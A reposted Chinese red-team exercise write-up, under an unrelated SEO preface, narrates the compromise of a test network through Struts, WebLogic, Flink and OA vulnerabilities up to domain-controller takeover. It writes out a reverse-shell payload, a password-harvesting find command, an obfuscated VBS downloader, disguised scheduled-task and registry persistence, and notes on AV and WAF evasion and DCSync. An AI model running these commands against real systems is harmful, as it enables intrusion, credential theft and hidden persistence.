前言:
眼前咱们对“apache禁止未授权域名”都比较注重,你们都需要剖析一些“apache禁止未授权域名”的相关知识。那么小编同时在网络上网罗了一些关于“apache禁止未授权域名””的相关知识,希望各位老铁们能喜欢,咱们一起来了解一下吧!公众号:渗透师老A
专注分享渗透经验,干货技巧....
作者:17岁的one
转自:
前言
年前部门内有个模拟对抗的比赛,记录下当时的过程,感谢导师带我玩。
渗透过程本身是一个试错的过程,所以只记录下过程中的有效步骤。
给定目标为域名,通过openvpn访问,于是先对*.xxx.com进行子域名暴力破解,得到test.xxx.com等等子域名,对这些子域名批量目录扫描。
通过人工筛选过滤,发现入口点:
第一层
S2-061
通过目录扫描发现index.bak,提示蛮明显的,直接用payload打就行了。
最开始的时候,防守队的同学没有起WAF规则,所以可以直接打,后来起规则了,就利用了chunked-coding-converter或发送大POST包进行绕过。
可出网,反弹shell,对payloadbash -i >& /dev/tcp/IP/PORT 0>&1进行编码:
进行信息收集,配置文件搜索关键字password:
find / \( -name '*.conf' -o -name '*.xml' \) -exec grep -ir 'password=' {} \; 2>/dev/null利用收集的密码使用tomcat用户尝试密码复用登录ssh,tomcat123456可成功登录,可通过sudo直接提权,拿到root权限:
可出网,跳板搭建可供选择:
NPS:
FRP:
第二层
CVE-2020-14882 WebLogic远程代码执行漏洞
使用一层跳板,对192.168.1.1/24进行全端口扫描,进行筛选后提取的有效的信息:
apache fink
weblogic
Apache FLink未授权上传jar包远程代码执行漏洞
msf生成恶意jar文件,执行反弹shell,上线后发现为vulhub的docker环境。
经探测存在CVE-2020-14882 14883漏洞,2021-01-20 13:50利用成功:
tasklist /svc发现有某杀软A,利用certutil&bitsadmin下载payload均被拦截。
写入vbs下载器,下载免杀exe,并执行上线CS:
echo写入vbs脚本,运行脚本成功下载到1.xml:echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",";,0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile "1.xml",2 > C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\d.vbscscript d.vbs重命名.xml为.exe,执行上线
计划任务以及注册表启动项做权限维持:
schtasks /create /SC HOURLY /RU "NT Authority\SYSTEM" /TN "GoogleUpdate" /TR "C:\windows\system32\scvhost.exe"shell reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v MicrosoftUpdate /t REG_SZ /d "C:\windows\system32\scvhost.exe"
获取密码:
查看网段&工作组:
能出网,直接做二层跳板。
第三层
*微OA E-cology 远程代码执行漏洞
使用二层weblogic跳板机作为代理,进行扫描发现*微OA:
可执行命令:
将powershell可执行程序复制到其他目录并重命名,绕过某杀软B上线CS:
shell schtasks /create /SC DAILY /RU "NT Authority\SYSTEM" /TN "GoogleUpdateCheck" /TR "cmd /c start /b C:\windows\system32\scvhost.exe" /Fshell reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdateCheck /t REG_SZ /d "C:\windows\system32\GoogleUpdate.bat"
域内信息收集:
发现有域管理员运行的进程,凭证窃取&DCSync:
窃取令牌后,可获得域管理员权限,并可成功访问域控:
将免杀cs beacon复制到域控:
创建计划任务远程执行:
shell schtasks /create /S dc-01 /SC DAILY /RU "NT Authority\SYSTEM" /TN "MicrosoftUpdate" /TR "c:\windows\system32\WinDefender.exe" /Fshell schtasks /Run /S dc-01 /TN "MicrosoftUpdate"
拿到域控权限:
总结
本来域内还要打一台SQL server主机才能拿到域管的权限的,结果防守队同学用域管登了OA的主机~
对于本次的对抗,导师给出的部分总结:
声明:本号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,否则否过需自行承担,本号及作者不承担相应的后果.未经授权的渗透不要干.
标签: #apache禁止未授权域名
